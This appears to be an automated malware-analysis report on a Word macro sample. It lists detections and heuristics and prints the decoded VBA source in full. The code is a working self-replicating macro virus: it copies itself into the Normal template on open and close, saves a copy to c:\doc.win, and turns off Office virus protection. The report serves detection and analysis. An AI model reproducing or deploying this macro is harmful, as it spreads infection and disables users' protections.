MALICIOUS
256
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
T1566.001 Spearphishing Attachment
The sample exhibits critical heuristic firings indicating VBA macro-virus replication and AV tampering. The AutoOpen macro attempts to copy itself and another macro ('ac') to the Normal template, and the AutoClose macro also attempts to copy macros and save the document. The script also attempts to disable virus protection and writes to a file path 'c:\doc.win', suggesting a dropper or downloader functionality. The ClamAV detection further supports its malicious nature.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-7369994-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-7369994-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Application.OrganizerCopy sr, ActiveDocument, Name:="ac", Object:=wdOrganizerObjectProjectItems -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub Autoopen() -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub AutoClose() -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2086 bytes |
SHA-256: 90df29a0471108a34b80fa5f2a16315260b4818cd98aca372c11c757625f93ca |
|||
|
Detection
ClamAV:
Win.Trojan.C-286
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "ac"
Sub AutoClose()
On Error GoTo ab
Call cf
sr = "c:\doc.win"
imacrocount = WordBasic.countmacros(1, 0, 0)
For i = 1 To imacrocount
zu$ = WordBasic.macroname$(i, 1)
If zu$ = "ao" Then GoTo ab
Next i
Application.OrganizerCopy sr, ActiveDocument, Name:="ac", Object:=wdOrganizerObjectProjectItems
Application.OrganizerCopy sr, ActiveDocument, Name:="ao", Object:=wdOrganizerObjectProjectItems
ActiveDocument.Save
ab:
End Sub
Sub ToolsMacro()
MsgBox "Èçâèíèòå, íî íà ïèðàòñêîé âåðñèè ýòà ôóíêöèÿ íå ðàáîòàåò", vbCritical, "Îøèáêà"
End Sub
Sub ViewVBCode()
MsgBox "Îøèáêà â ñèñòåìíîì ðååñòðå Windows!", vbCritical, "Error"
End Sub
Sub toolsOptions()
MsgBox "Âàø êîìïüþòåð òåïåðü îáëàäàåò óäèâèòåëüíûì ñâîéñòâîì" + Chr$(13) + "-â í¸ì åñòü ÆÈÇÍÜ!"
End Sub
'Âîò îí ìîé ïåðâåíåö!
'Èìÿ åìó - 1313. Ïðîøó çàïîìíèòü!!!
Attribute VB_Name = "ao"
Sub Autoopen()
Attribute Autoopen.VB_Description = "Fuck"
Attribute Autoopen.VB_ProcData.VB_Invoke_Func = "Project.NewMacros.one"
On Error GoTo aT
im = WordBasic.countmacros(0, 0)
For i = 1 To im
If WordBasic.macroname$(i, 0, 0) = "ao" Then
bI = -1
End If
Next i
If Not bI Then
sE$ = WordBasic.FileName$()
mR$ = sE$ + ":ao"
WordBasic.MacroCopy mR$, "Normal:ao", 1
mR$ = sE$ + ":ac"
WordBasic.MacroCopy mR$, "Normal:ac", 1
End If
Call cf
aT:
With Options
.VirusProtection = False
.SaveNormalPrompt = False
End With
End Sub
Sub cf()
On Error GoTo z
MF = Dir("c:\doc.win")
If MF = "doc.win" Then GoTo z
a = ActiveDocument.FullName
ActiveDocument.SaveAs "c:\doc.win"
ActiveDocument.SaveAs a
z:
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.